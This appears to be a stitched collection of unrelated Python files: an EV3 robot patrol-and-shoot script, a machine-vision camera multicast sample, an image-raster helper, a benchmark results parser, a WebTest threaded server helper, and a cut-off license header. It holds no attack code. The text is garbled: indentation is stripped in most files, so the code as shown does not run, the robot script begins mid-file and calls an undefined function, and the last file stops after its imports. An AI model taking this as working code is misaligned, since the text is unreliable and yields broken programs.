tank_shooter = MediumMotor(OUTPUT_D)
tank_shooter.on_for_rotations(SpeedPercent(75), 4)
def walkSeconds(direction, velocity, seconds):
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
steering_drive.on_for_seconds(direction, SpeedPercent(velocity), seconds)
def walkRotations(direction, velocity, rotations):
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
steering_drive.on_for_rotations(direction, SpeedPercent(velocity), rotations)
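# Note added for clarity: in ev3dev2, MoveSteering interprets `direction` as a
# steering value from -100 (hard left) through 0 (straight ahead) to +100 (hard
# right), and `velocity` as a percentage of full motor speed, so
# walkSeconds(0, 50, 5) should drive straight at half speed for five seconds.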
#-------------------------------------- MOVEMENT METHODS ---------------------------------------#
def walkOnly():
walkSeconds(0,50,5)
def walkRight():
walkRotations(-20,50,2)
def turnRight():
walkSeconds(100,50,1)
# walkRotations(-100,50,1)
def turnLeft():
walkRotations(-100,50,1)
def walkLeft():
walkRotations(20,50,2)
def walkBack():
walkRotations(-100,50,3)
#-------------------------------------- WORKERS ---------------------------------------#
def proxDetectWorker():
global stopMotorSensor
global stopProxSensor
global stopInfraredSensor
global infrared_sensor
shots=3
infrared_sensor.mode = 'IR-PROX'
while True:
if(stopProxSensor):
break
distance = infrared_sensor.value()
if distance < 5:
stopMotorSensor=True
time.sleep(0.5)
turnRight()
stopMotorSensor=False
t2 = threading.Thread(target=onlyWalkWorker)
t2.start()
def turnRightWorker():
global sleep_time
while True:
turnRight()
print(sleep_time)
time.sleep(sleep_time)
sleep_time=0.3
def patrulha():
    global infrared_sensor
    infrared_sensor.mode = 'IR-SEEK'
    while True:
        # heading_and_distance() returns (heading, distance) for the beacon on
        # channel CANAL; the heading runs roughly from -25 (left) to +25 (right).
        dis = infrared_sensor.heading_and_distance(CANAL)
        if dis[0] is not None and dis[1] is not None:
            # Turn towards the beacon; the local is named turn_time so it does
            # not shadow the imported time module.
            if dis[0] < 0:
                turn_time = ((dis[0] * 2.2) / 100.0) * (-1)
                if turn_time == 0:
                    walkSeconds(-100, 100, 0.75)
                walkSeconds(-100, 100, turn_time)
            else:
                turn_time = (dis[0] * 2.2) / 100.0
                if turn_time == 0:
                    walkSeconds(100, 100, 0.75)
                walkSeconds(100, 100, turn_time)
            dis = infrared_sensor.heading_and_distance(CANAL)
            if (dis[0] is not None and dis[1] is not None
                    and -2 < dis[0] < 2 and dis[1] < 60):
                oneShooter()
            else:
                walkSeconds(100, 50, 1)
def onlyWalkWorker():
global stopInfraredSensor
global stopMotorSensor
while True:
if(stopMotorSensor):
break
walkOnly()
# movement with stops
def onlyWalkWithStopWorker():
global stopInfraredSensor
global stopMotorSensor
while True:
if(stopMotorSensor):
break
time.sleep(0.2)
walkRotations(0,100,2)
time.sleep(0.2)
#-------------------------------------- MAIN ---------------------------------------#
ts = TouchSensor(INPUT_2)
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
while not ts.is_pressed:
time.sleep(0.2)
def main():
global stopInfraredSensor
global stopMotorSensor
global stopGiraSensor
# global stopProxSensor
global infrared_sensor
infrared_sensor = InfraredSensor(INPUT_1)
stopInfraredSensor=False
stopMotorSensor=False
stopGiraSensor=False
# stopProxSensor=False
# t1 = threading.Thread(target=robotDetectWorker)
# t1.start()
#
# t2 = threading.Thread(target=onlyWalkWithStopWorker)
# t2.start()
walkSeconds(0,100,6)
# tp = threading.Thread(target=patrulha)
# tp.start()
patrulha()
main()
|
MultiCast.py
|
# -- coding: utf-8 --
import sys
import threading
import msvcrt
from ctypes import *
sys.path.append("../MvImport")
from MvCameraControl_class import *
g_bExit = False
# Define the function executed by the frame-grabbing worker thread
def work_thread(cam=0, pData=0, nDataSize=0):
stFrameInfo = MV_FRAME_OUT_INFO_EX()
memset(byref(stFrameInfo), 0, sizeof(stFrameInfo))
while True:
ret = cam.MV_CC_GetOneFrameTimeout(pData, nDataSize, stFrameInfo, 1000)
if ret == 0:
print ("get one frame: Width[%d], Height[%d], nFrameNum[%d]" % (stFrameInfo.nWidth, stFrameInfo.nHeight, stFrameInfo.nFrameNum))
else:
print ("no data[0x%x]" % ret)
if g_bExit == True:
break
if __name__ == "__main__":
deviceList = MV_CC_DEVICE_INFO_LIST()
tlayerType = MV_GIGE_DEVICE | MV_USB_DEVICE
# ch:枚举设备 | en:Enum device
ret = MvCamera.MV_CC_EnumDevices(tlayerType, deviceList)
if ret != 0:
print ("enum devices fail! ret[0x%x]" % ret)
sys.exit()
if deviceList.nDeviceNum == 0:
print ("find no device!")
sys.exit()
print ("find %d devices!" % deviceList.nDeviceNum)
for i in range(0, deviceList.nDeviceNum):
mvcc_dev_info = cast(deviceList.pDeviceInfo[i], POINTER(MV_CC_DEVICE_INFO)).contents
if mvcc_dev_info.nTLayerType == MV_GIGE_DEVICE:
print ("\ngige device: [%d]" % i)
strModeName = ""
for per in mvcc_dev_info.SpecialInfo.stGigEInfo.chModelName:
strModeName = strModeName + chr(per)
print ("device model name: %s" % strModeName)
nip1 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0xff000000) >> 24)
nip2 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x00ff0000) >> 16)
nip3 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x0000ff00) >> 8)
nip4 = (mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x000000ff)
print ("current ip: %d.%d.%d.%d\n" % (nip1, nip2, nip3, nip4))
elif mvcc_dev_info.nTLayerType == MV_USB_DEVICE:
print ("\nu3v device: [%d]" % i)
strModeName = ""
for per in mvcc_dev_info.SpecialInfo.stUsb3VInfo.chModelName:
if per == 0:
break
strModeName = strModeName + chr(per)
print ("device model name: %s" % strModeName)
strSerialNumber = ""
for per in mvcc_dev_info.SpecialInfo.stUsb3VInfo.chSerialNumber:
if per == 0:
break
strSerialNumber = strSerialNumber + chr(per)
print ("user serial number: %s" % strSerialNumber)
nConnectionNum = input("please input the number of the device to connect:")
if int(nConnectionNum) >= deviceList.nDeviceNum:
print ("intput error!")
sys.exit()
    # ch:创建相机实例 | en:Create Camera Object
cam = MvCamera()
# ch:选择设备并创建句柄 | en:Select device and create handle
stDeviceList = cast(deviceList.pDeviceInfo[int(nConnectionNum)], POINTER(MV_CC_DEVICE_INFO)).contents
ret = cam.MV_CC_CreateHandle(stDeviceList)
if ret != 0:
print ("create handle fail! ret[0x%x]" % ret)
sys.exit()
#ch:询问用户启动多播控制应用程序或多播监控应用程序
#en:Ask the user to launch: the multicast controlling application or the multicast monitoring application.
print ("start multicast sample in (c)ontrol or in (m)onitor mode? (c/m)")
key = msvcrt.getch()
key = bytes.decode(key)
#ch:查询用户使用的模式 | en:Query the user for the mode to use.
monitor = False
if key == 'm' or key == 'M':
monitor = True
elif key == 'c' or key == 'C':
monitor = False
else:
print ("intput error!")
sys.exit()
if monitor:
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Monitor, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
else:
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Control, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
# ch:探测网络最佳包大小(只对GigE相机有效) | en:Detection network optimal package size(It only works for the GigE camera)
if stDeviceList.nTLayerType == MV_GIGE_DEVICE:
nPacketSize = cam.MV_CC_GetOptimalPacketSize()
if int(nPacketSize) > 0:
ret = cam.MV_CC_SetIntValue("GevSCPSPacketSize",nPacketSize)
if ret != 0:
print ("Warning: Set Packet Size fail! ret[0x%x]" % ret)
else:
print ("Warning: Get Packet Size fail! ret[0x%x]" % nPacketSize)
#ch:获取数据包大小 | en:Get payload size
stParam = MVCC_INTVALUE()
memset(byref(stParam), 0, sizeof(MVCC_INTVALUE))
ret = cam.MV_CC_GetIntValue("PayloadSize", stParam)
if ret != 0:
print ("get payload size fail! ret[0x%x]" % ret)
sys.exit()
nPayloadSize = stParam.nCurValue
#ch:指定组播ip | en:multicast IP
strIp = "239.0.1.23"
device_ip_list = strIp.split('.')
dest_ip = (int(device_ip_list[0]) << 24) | (int(device_ip_list[1]) << 16) | (int(device_ip_list[2]) << 8) | int(device_ip_list[3])
print ("dest ip: %s" % strIp)
#ch:可指定端口号作为组播组端口 | en:multicast port
stTransmissionType = MV_TRANSMISSION_TYPE()
memset(byref(stTransmissionType), 0, sizeof(MV_TRANSMISSION_TYPE))
stTransmissionType.enTransmissionType = MV_GIGE_TRANSTYPE_MULTICAST
stTransmissionType.nDestIp = dest_ip
stTransmissionType.nDestPort = 8787
ret = cam.MV_GIGE_SetTransmissionType(stTransmissionType)
if MV_OK != ret:
print ("set transmission type fail! ret [0x%x]" % ret)
# ch:开始取流 | en:Start grab image
ret = cam.MV_CC_StartGrabbing()
if ret != 0:
print ("start grabbing fail! ret[0x%x]" % ret)
sys.exit()
data_buf = (c_ubyte * nPayloadSize)()
try:
hThreadHandle = threading.Thread(target=work_thread, args=(cam, byref(data_buf), nPayloadSize))
hThreadHandle.start()
except:
print ("error: unable to start thread")
print ("press a key to stop grabbing.")
msvcrt.getch()
g_bExit = True
hThreadHandle.join()
# ch:停止取流 | en:Stop grab image
ret = cam.MV_CC_StopGrabbing()
if ret != 0:
print ("stop grabbing fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
# ch:关闭设备 | Close device
ret = cam.MV_CC_CloseDevice()
if ret != 0:
print ("close deivce fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
# ch:销毁句柄 | Destroy handle
ret = cam.MV_CC_DestroyHandle()
if ret != 0:
print ("destroy handle fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
del data_buf
|
graphics.py
|
import numpy as np
from PIL import Image
import time
import threading
def save_image(x, path):
im = Image.fromarray(x)
im.save(path, optimize=True)
return
# Assumes [NCHW] format
def save_raster(x, path, rescale=False, width=None):
t = threading.Thread(target=_save_raster, args=(x, path, rescale, width))
t.start()
def _save_raster(x, path, rescale, width):
x = to_raster(x, rescale, width)
save_image(x, path)
# Shape: (n_patches,rows,columns,channels)
def to_raster_old(x, rescale=False, width=None):
x = np.transpose(x, (0, 3, 1, 2))
#x = x.swapaxes(2, 3)
if len(x.shape) == 3:
x = x.reshape((x.shape[0], 1, x.shape[1], x.shape[2]))
if x.shape[1] == 1:
x = np.repeat(x, 3, axis=1)
if rescale:
x = (x - x.min()) / (x.max() - x.min()) * 255.
x = np.clip(x, 0, 255)
assert len(x.shape) == 4
assert x.shape[1] == 3
n_patches = x.shape[0]
if width is None:
width = int(np.ceil(np.sqrt(n_patches))) # result width
height = int(n_patches/width) # result height
tile_height = x.shape[2]
tile_width = x.shape[3]
result = np.zeros((3, int(height*tile_height),
int(width*tile_width)), dtype='uint8')
for i in range(height):
for j in range(width):
            # tile (i, j) takes batch element width*i + j
            result[:, i*tile_height:(i+1)*tile_height,
                   j*tile_width:(j+1)*tile_width] = x[width*i+j]
return result
# Shape: (n_patches,rows,columns,channels)
def to_raster(x, rescale=False, width=None):
if len(x.shape) == 3:
x = x.reshape((x.shape[0], x.shape[1], x.shape[2], 1))
if x.shape[3] == 1:
x = np.repeat(x, 3, axis=3)
if rescale:
x = (x - x.min()) / (x.max() - x.min()) * 255.
x = np.clip(x, 0, 255)
assert len(x.shape) == 4
assert x.shape[3] == 3
n_batch = x.shape[0]
if width is None:
width = int(np.ceil(np.sqrt(n_batch))) # result width
height = int(n_batch / width) # result height
tile_height = x.shape[1]
tile_width = x.shape[2]
result = np.zeros((int(height * tile_height),
int(width * tile_width), 3), dtype='uint8')
for i in range(height):
for j in range(width):
result[i * tile_height:(i + 1) * tile_height, j *
tile_width:(j + 1) * tile_width] = x[width*i+j]
return result
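# Minimal usage sketch (illustrative only; the batch and file name below are
# made up): tile a random NHWC uint8 batch into one raster image and write it
# from a background thread via save_raster().
if __name__ == '__main__':
    demo_batch = (np.random.rand(16, 32, 32, 3) * 255).astype('uint8')
    save_raster(demo_batch, 'raster_demo.png')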
|
results.py
|
from toolset.utils.output_helper import log
import os
import subprocess
import uuid
import time
import json
import requests
import threading
import re
import math
import csv
import traceback
from datetime import datetime
# Cross-platform colored text
from colorama import Fore, Style
class Results:
def __init__(self, benchmarker):
'''
Constructor
'''
self.benchmarker = benchmarker
self.config = benchmarker.config
self.directory = os.path.join(self.config.results_root,
self.config.timestamp)
try:
os.makedirs(self.directory)
except OSError:
pass
self.file = os.path.join(self.directory, "results.json")
self.uuid = str(uuid.uuid4())
self.name = datetime.now().strftime(self.config.results_name)
self.environmentDescription = self.config.results_environment
try:
self.git = dict()
self.git['commitId'] = self.__get_git_commit_id()
self.git['repositoryUrl'] = self.__get_git_repository_url()
self.git['branchName'] = self.__get_git_branch_name()
except Exception:
#Could not read local git repository, which is fine.
self.git = None
self.startTime = int(round(time.time() * 1000))
self.completionTime = None
self.concurrencyLevels = self.config.concurrency_levels
self.pipelineConcurrencyLevels = self.config.pipeline_concurrency_levels
self.queryIntervals = self.config.query_levels
self.cachedQueryIntervals = self.config.cached_query_levels
self.frameworks = [t.name for t in benchmarker.tests]
self.duration = self.config.duration
self.rawData = dict()
self.rawData['json'] = dict()
self.rawData['db'] = dict()
self.rawData['query'] = dict()
self.rawData['fortune'] = dict()
self.rawData['update'] = dict()
self.rawData['plaintext'] = dict()
self.rawData['cached_query'] = dict()
self.completed = dict()
self.succeeded = dict()
self.succeeded['json'] = []
self.succeeded['db'] = []
self.succeeded['query'] = []
self.succeeded['fortune'] = []
self.succeeded['update'] = []
self.succeeded['plaintext'] = []
self.succeeded['cached_query'] = []
self.failed = dict()
self.failed['json'] = []
self.failed['db'] = []
self.failed['query'] = []
self.failed['fortune'] = []
self.failed['update'] = []
self.failed['plaintext'] = []
self.failed['cached_query'] = []
self.verify = dict()
#############################################################################
# PUBLIC FUNCTIONS
#############################################################################
def parse(self, tests):
'''
Ensures that the system has all necessary software to run
the tests. This does not include that software for the individual
test, but covers software such as curl and weighttp that
are needed.
'''
        # Run the method to get the commit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(self.file, "w") as f:
f.write(json.dumps(self.__to_jsonable(), indent=2))
def parse_test(self, framework_test, test_type):
'''
Parses the given test and test_type from the raw_file.
'''
results = dict()
results['results'] = []
stats = []
if os.path.exists(self.get_raw_file(framework_test.name, test_type)):
with open(self.get_raw_file(framework_test.name,
test_type)) as raw_data:
is_warmup = True
rawData = None
for line in raw_data:
if "Queries:" in line or "Concurrency:" in line:
is_warmup = False
rawData = None
continue
if "Warmup" in line or "Primer" in line:
is_warmup = True
continue
if not is_warmup:
if rawData == None:
rawData = dict()
results['results'].append(rawData)
if "Latency" in line:
m = re.findall(r"([0-9]+\.*[0-9]*[us|ms|s|m|%]+)",
line)
if len(m) == 4:
rawData['latencyAvg'] = m[0]
rawData['latencyStdev'] = m[1]
rawData['latencyMax'] = m[2]
if "requests in" in line:
m = re.search("([0-9]+) requests in", line)
if m != None:
rawData['totalRequests'] = int(m.group(1))
if "Socket errors" in line:
if "connect" in line:
m = re.search("connect ([0-9]+)", line)
rawData['connect'] = int(m.group(1))
if "read" in line:
m = re.search("read ([0-9]+)", line)
rawData['read'] = int(m.group(1))
if "write" in line:
m = re.search("write ([0-9]+)", line)
rawData['write'] = int(m.group(1))
if "timeout" in line:
m = re.search("timeout ([0-9]+)", line)
rawData['timeout'] = int(m.group(1))
if "Non-2xx" in line:
m = re.search("Non-2xx or 3xx responses: ([0-9]+)",
line)
if m != None:
rawData['5xx'] = int(m.group(1))
if "STARTTIME" in line:
m = re.search("[0-9]+", line)
rawData["startTime"] = int(m.group(0))
if "ENDTIME" in line:
m = re.search("[0-9]+", line)
rawData["endTime"] = int(m.group(0))
test_stats = self.__parse_stats(
framework_test, test_type,
rawData["startTime"], rawData["endTime"], 1)
stats.append(test_stats)
with open(
self.get_stats_file(framework_test.name, test_type) + ".json",
"w") as stats_file:
json.dump(stats, stats_file, indent=2)
return results
def parse_all(self, framework_test):
'''
Method meant to be run for a given timestamp
'''
for test_type in framework_test.runTests:
if os.path.exists(
self.get_raw_file(framework_test.name, test_type)):
results = self.parse_test(framework_test, test_type)
self.report_benchmark_results(framework_test, test_type,
results['results'])
def write_intermediate(self, test_name, status_message):
'''
Writes the intermediate results for the given test_name and status_message
'''
self.completed[test_name] = status_message
self.__write_results()
def set_completion_time(self):
'''
Sets the completionTime for these results and writes the results
'''
self.completionTime = int(round(time.time() * 1000))
self.__write_results()
def upload(self):
'''
Attempts to upload the results.json to the configured results_upload_uri
'''
if self.config.results_upload_uri != None:
try:
requests.post(
self.config.results_upload_uri,
headers={'Content-Type': 'application/json'},
data=json.dumps(self.__to_jsonable(), indent=2))
except (Exception):
log("Error uploading results.json")
def load(self):
'''
Load the results.json file
'''
try:
with open(self.file) as f:
self.__dict__.update(json.load(f))
except (ValueError, IOError):
pass
def get_raw_file(self, test_name, test_type):
'''
Returns the output file for this test_name and test_type
Example: fw_root/results/timestamp/test_type/test_name/raw.txt
'''
path = os.path.join(self.directory, test_name, test_type, "raw.txt")
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
def get_stats_file(self, test_name, test_type):
'''
Returns the stats file name for this test_name and
Example: fw_root/results/timestamp/test_type/test_name/stats.txt
'''
path = os.path.join(self.directory, test_name, test_type, "stats.txt")
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
def report_verify_results(self, framework_test, test_type, result):
'''
Used by FrameworkTest to add verification details to our results
TODO: Technically this is an IPC violation - we are accessing
the parent process' memory from the child process
'''
if framework_test.name not in self.verify.keys():
self.verify[framework_test.name] = dict()
self.verify[framework_test.name][test_type] = result
def report_benchmark_results(self, framework_test, test_type, results):
'''
Used by FrameworkTest to add benchmark data to this
TODO: Technically this is an IPC violation - we are accessing
the parent process' memory from the child process
'''
if test_type not in self.rawData.keys():
self.rawData[test_type] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.rawData[test_type][framework_test.name] = results
# This may already be set for single-tests
if framework_test.name not in self.succeeded[test_type]:
self.succeeded[test_type].append(framework_test.name)
else:
# This may already be set for single-tests
if framework_test.name not in self.failed[test_type]:
self.failed[test_type].append(framework_test.name)
def finish(self):
'''
Finishes these results.
'''
if not self.config.parse:
# Normally you don't have to use Fore.BLUE before each line, but
# Travis-CI seems to reset color codes on newline (see travis-ci/travis-ci#2692)
# or stream flush, so we have to ensure that the color code is printed repeatedly
log("Verification Summary",
border='=',
border_bottom='-',
color=Fore.CYAN)
for test in self.benchmarker.tests:
log(Fore.CYAN + "| {!s}".format(test.name))
if test.name in self.verify.keys():
                    for test_type, result in self.verify[
                            test.name].items():
if result.upper() == "PASS":
color = Fore.GREEN
elif result.upper() == "WARN":
color = Fore.YELLOW
else:
color = Fore.RED
log(Fore.CYAN + "| " + test_type.ljust(13) +
' : ' + color + result.upper())
else:
log(Fore.CYAN + "| " + Fore.RED +
"NO RESULTS (Did framework launch?)")
log('', border='=', border_bottom='', color=Fore.CYAN)
log("Results are saved in " + self.directory)
#############################################################################
# PRIVATE FUNCTIONS
#############################################################################
def __to_jsonable(self):
'''
Returns a dict suitable for jsonification
'''
toRet = dict()
toRet['uuid'] = self.uuid
toRet['name'] = self.name
toRet['environmentDescription'] = self.environmentDescription
toRet['git'] = self.git
toRet['startTime'] = self.startTime
toRet['completionTime'] = self.completionTime
toRet['concurrencyLevels'] = self.concurrencyLevels
toRet['pipelineConcurrencyLevels'] = self.pipelineConcurrencyLevels
toRet['queryIntervals'] = self.queryIntervals
toRet['cachedQueryIntervals'] = self.cachedQueryIntervals
toRet['frameworks'] = self.frameworks
toRet['duration'] = self.duration
toRet['rawData'] = self.rawData
toRet['completed'] = self.completed
toRet['succeeded'] = self.succeeded
toRet['failed'] = self.failed
toRet['verify'] = self.verify
return toRet
def __write_results(self):
try:
with open(self.file, 'w') as f:
f.write(json.dumps(self.__to_jsonable(), indent=2))
except (IOError):
log("Error writing results.json")
def __count_sloc(self):
'''
Counts the significant lines of code for all tests and stores in results.
'''
frameworks = self.benchmarker.metadata.gather_frameworks(
self.config.test, self.config.exclude)
framework_to_count = {}
for framework, testlist in frameworks.items():
wd = testlist[0].directory
# Find the last instance of the word 'code' in the yaml output. This
# should be the line count for the sum of all listed files or just
# the line count for the last file in the case where there's only
# one file listed.
command = "cloc --yaml --follow-links . | grep code | tail -1 | cut -d: -f 2"
log("Running \"%s\" (cwd=%s)" % (command, wd))
try:
line_count = int(subprocess.check_output(command, cwd=wd, shell=True))
except (subprocess.CalledProcessError, ValueError) as e:
log("Unable to count lines of code for %s due to error '%s'" %
(framework, e))
continue
log("Counted %s lines of code" % line_count)
framework_to_count[framework] = line_count
self.rawData['slocCounts'] = framework_to_count
def __count_commits(self):
'''
Count the git commits for all the framework tests
'''
frameworks = self.benchmarker.metadata.gather_frameworks(
self.config.test, self.config.exclude)
        def count_commit(directory, framework, jsonResult):
            command = "git rev-list HEAD -- " + directory + " | sort -u | wc -l"
            try:
                commitCount = subprocess.check_output(command, shell=True)
                # Store under the framework name passed in explicitly; reading
                # the enclosing loop variable from a worker thread would be racy.
                jsonResult[framework] = int(commitCount)
            except subprocess.CalledProcessError:
                pass
# Because git can be slow when run in large batches, this
# calls git up to 4 times in parallel. Normal improvement is ~3-4x
# in my trials, or ~100 seconds down to ~25
# This is safe to parallelize as long as each thread only
# accesses one key in the dictionary
threads = []
jsonResult = {}
# t1 = datetime.now()
for framework, testlist in frameworks.items():
directory = testlist[0].directory
t = threading.Thread(
                target=count_commit, args=(directory, framework, jsonResult))
t.start()
threads.append(t)
# Git has internal locks, full parallel will just cause contention
# and slowness, so we rate-limit a bit
if len(threads) >= 4:
threads[0].join()
threads.remove(threads[0])
# Wait for remaining threads
for t in threads:
t.join()
# t2 = datetime.now()
# print "Took %s seconds " % (t2 - t1).seconds
self.rawData['commitCounts'] = jsonResult
self.config.commits = jsonResult
def __get_git_commit_id(self):
'''
Get the git commit id for this benchmark
'''
return subprocess.check_output(
["git", "rev-parse", "HEAD"], cwd=self.config.fw_root).strip()
def __get_git_repository_url(self):
'''
Gets the git repository url for this benchmark
'''
return subprocess.check_output(
["git", "config", "--get", "remote.origin.url"],
cwd=self.config.fw_root).strip()
def __get_git_branch_name(self):
'''
Gets the git branch name for this benchmark
'''
return subprocess.check_output(
'git rev-parse --abbrev-ref HEAD',
shell=True,
cwd=self.config.fw_root).strip()
def __parse_stats(self, framework_test, test_type, start_time, end_time,
interval):
'''
For each test type, process all the statistics, and return a multi-layered
dictionary that has a structure as follows:
(timestamp)
| (main header) - group that the stat is in
| | (sub header) - title of the stat
| | | (stat) - the stat itself, usually a floating point number
'''
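        # Illustrative shape of the returned structure (timestamps and values
        # below are made up):
        #   {1510526176.0: {'total cpu usage': {'usr': 12.0, 'sys': 3.0, 'idl': 85.0},
        #                   'memory usage': {'used': 1.2e9, 'free': 6.8e9}}}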
stats_dict = dict()
stats_file = self.get_stats_file(framework_test.name, test_type)
with open(stats_file) as stats:
# dstat doesn't output a completely compliant CSV file - we need to strip the header
            while (next(stats) != "\n"):
                pass
            stats_reader = csv.reader(stats)
            main_header = next(stats_reader)
            sub_header = next(stats_reader)
time_row = sub_header.index("epoch")
int_counter = 0
for row in stats_reader:
time = float(row[time_row])
int_counter += 1
if time < start_time:
continue
elif time > end_time:
return stats_dict
if int_counter % interval != 0:
continue
row_dict = dict()
for nextheader in main_header:
if nextheader != "":
row_dict[nextheader] = dict()
header = ""
for item_num, column in enumerate(row):
if (len(main_header[item_num]) != 0):
header = main_header[item_num]
# all the stats are numbers, so we want to make sure that they stay that way in json
row_dict[header][sub_header[item_num]] = float(column)
stats_dict[time] = row_dict
return stats_dict
def __calculate_average_stats(self, raw_stats):
'''
We have a large amount of raw data for the statistics that may be useful
for the stats nerds, but most people care about a couple of numbers. For
now, we're only going to supply:
* Average CPU
* Average Memory
* Total network use
* Total disk use
More may be added in the future. If they are, please update the above list.
Note: raw_stats is directly from the __parse_stats method.
Recall that this consists of a dictionary of timestamps, each of which
contain a dictionary of stat categories which contain a dictionary of stats
'''
raw_stat_collection = dict()
        for time_dict in raw_stats.values():
for main_header, sub_headers in time_dict.items():
item_to_append = None
if 'cpu' in main_header:
                    # We want to take the idl stat and subtract it from 100
                    # to get the time that the CPU is NOT idle.
                    item_to_append = 100.0 - sub_headers['idl']
elif main_header == 'memory usage':
item_to_append = sub_headers['used']
elif 'net' in main_header:
                    # Network stats have two parts - receive and send. We'll use a tuple of
                    # style (receive, send)
item_to_append = (sub_headers['recv'], sub_headers['send'])
                elif 'dsk' in main_header or 'io' in main_header:
# Similar for network, except our tuple looks like (read, write)
item_to_append = (sub_headers['read'], sub_headers['writ'])
if item_to_append is not None:
if main_header not in raw_stat_collection:
raw_stat_collection[main_header] = list()
raw_stat_collection[main_header].append(item_to_append)
# Simple function to determine human readable size
# http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size
def sizeof_fmt(num):
            # We'll assume that any number we get is convertible to a float, just in case
num = float(num)
for x in ['bytes', 'KB', 'MB', 'GB']:
if num < 1024.0 and num > -1024.0:
return "%3.1f%s" % (num, x)
num /= 1024.0
return "%3.1f%s" % (num, 'TB')
# Now we have our raw stats in a readable format - we need to format it for display
# We need a floating point sum, so the built in sum doesn't cut it
display_stat_collection = dict()
for header, values in raw_stat_collection.items():
display_stat = None
if 'cpu' in header:
display_stat = sizeof_fmt(math.fsum(values) / len(values))
            elif header == 'memory usage':
                display_stat = sizeof_fmt(math.fsum(values) / len(values))
            elif 'net' in header:
receive, send = zip(*values) # unzip
display_stat = {
'receive': sizeof_fmt(math.fsum(receive)),
'send': sizeof_fmt(math.fsum(send))
}
else: # if 'dsk' or 'io' in header:
read, write = zip(*values) # unzip
display_stat = {
'read': sizeof_fmt(math.fsum(read)),
'write': sizeof_fmt(math.fsum(write))
}
display_stat_collection[header] = display_stat
return display_stat_collection
|
http.py
|
# -*- coding: utf-8 -*-
"""
This module contains some helpers to deal with the real http
world.
"""
import threading
import logging
import select
import socket
import time
import os
import six
import webob
from six.moves import http_client
from waitress.server import TcpWSGIServer
def get_free_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
ip, port = s.getsockname()
s.close()
ip = os.environ.get('WEBTEST_SERVER_BIND', '127.0.0.1')
return ip, port
def check_server(host, port, path_info='/', timeout=3, retries=30):
"""Perform a request until the server reply"""
if retries < 0:
return 0
time.sleep(.3)
for i in range(retries):
try:
conn = http_client.HTTPConnection(host, int(port), timeout=timeout)
conn.request('GET', path_info)
res = conn.getresponse()
return res.status
except (socket.error, http_client.HTTPException):
time.sleep(.3)
return 0
class StopableWSGIServer(TcpWSGIServer):
"""StopableWSGIServer is a TcpWSGIServer which run in a separated thread.
This allow to use tools like casperjs or selenium.
Server instance have an ``application_url`` attribute formated with the
server host and port.
"""
was_shutdown = False
def __init__(self, application, *args, **kwargs):
super(StopableWSGIServer, self).__init__(self.wrapper, *args, **kwargs)
self.runner = None
self.test_app = application
self.application_url = 'http://%s:%s/' % (self.adj.host, self.adj.port)
def wrapper(self, environ, start_response):
"""Wrap the wsgi application to override some path:
``/__application__``: allow to ping the server.
``/__file__?__file__={path}``: serve the file found at ``path``
"""
if '__file__' in environ['PATH_INFO']:
req = webob.Request(environ)
resp = webob.Response()
resp.content_type = 'text/html; charset=UTF-8'
filename = req.params.get('__file__')
if os.path.isfile(filename):
body = open(filename, 'rb').read()
body = body.replace(six.b('http://localhost/'),
six.b('http://%s/' % req.host))
resp.body = body
else:
resp.status = '404 Not Found'
return resp(environ, start_response)
elif '__application__' in environ['PATH_INFO']:
return webob.Response('server started')(environ, start_response)
return self.test_app(environ, start_response)
def run(self):
"""Run the server"""
try:
self.asyncore.loop(.5, map=self._map)
except select.error: # pragma: no cover
if not self.was_shutdown:
raise
def shutdown(self):
"""Shutdown the server"""
# avoid showing traceback related to asyncore
self.was_shutdown = True
self.logger.setLevel(logging.FATAL)
while self._map:
triggers = list(self._map.values())
for trigger in triggers:
trigger.handle_close()
self.maintenance(0)
self.task_dispatcher.shutdown()
return True
@classmethod
def create(cls, application, **kwargs):
"""Start a server to serve ``application``. Return a server
instance."""
host, port = get_free_port()
if 'port' not in kwargs:
kwargs['port'] = port
if 'host' not in kwargs:
kwargs['host'] = host
if 'expose_tracebacks' not in kwargs:
kwargs['expose_tracebacks'] = True
server = cls(application, **kwargs)
server.runner = threading.Thread(target=server.run)
server.runner.daemon = True
server.runner.start()
return server
def wait(self, retries=30):
"""Wait until the server is started"""
running = check_server(self.adj.host, self.adj.port,
'/__application__', retries=retries)
if running:
return True
try:
self.shutdown()
finally:
return False
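# Illustrative sketch only (not part of the original module): typical usage is to
# wrap a WSGI app, wait for the server to come up, then shut it down. The trivial
# `demo_app` below is made up for this example.
if __name__ == '__main__':
    def demo_app(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return [six.b('hello')]

    server = StopableWSGIServer.create(demo_app)
    if server.wait():
        print('serving on %s' % server.application_url)
    server.shutdown()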
|
eventloop.py
|
# Copyright 2021 Bluefog Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import abc
import logging
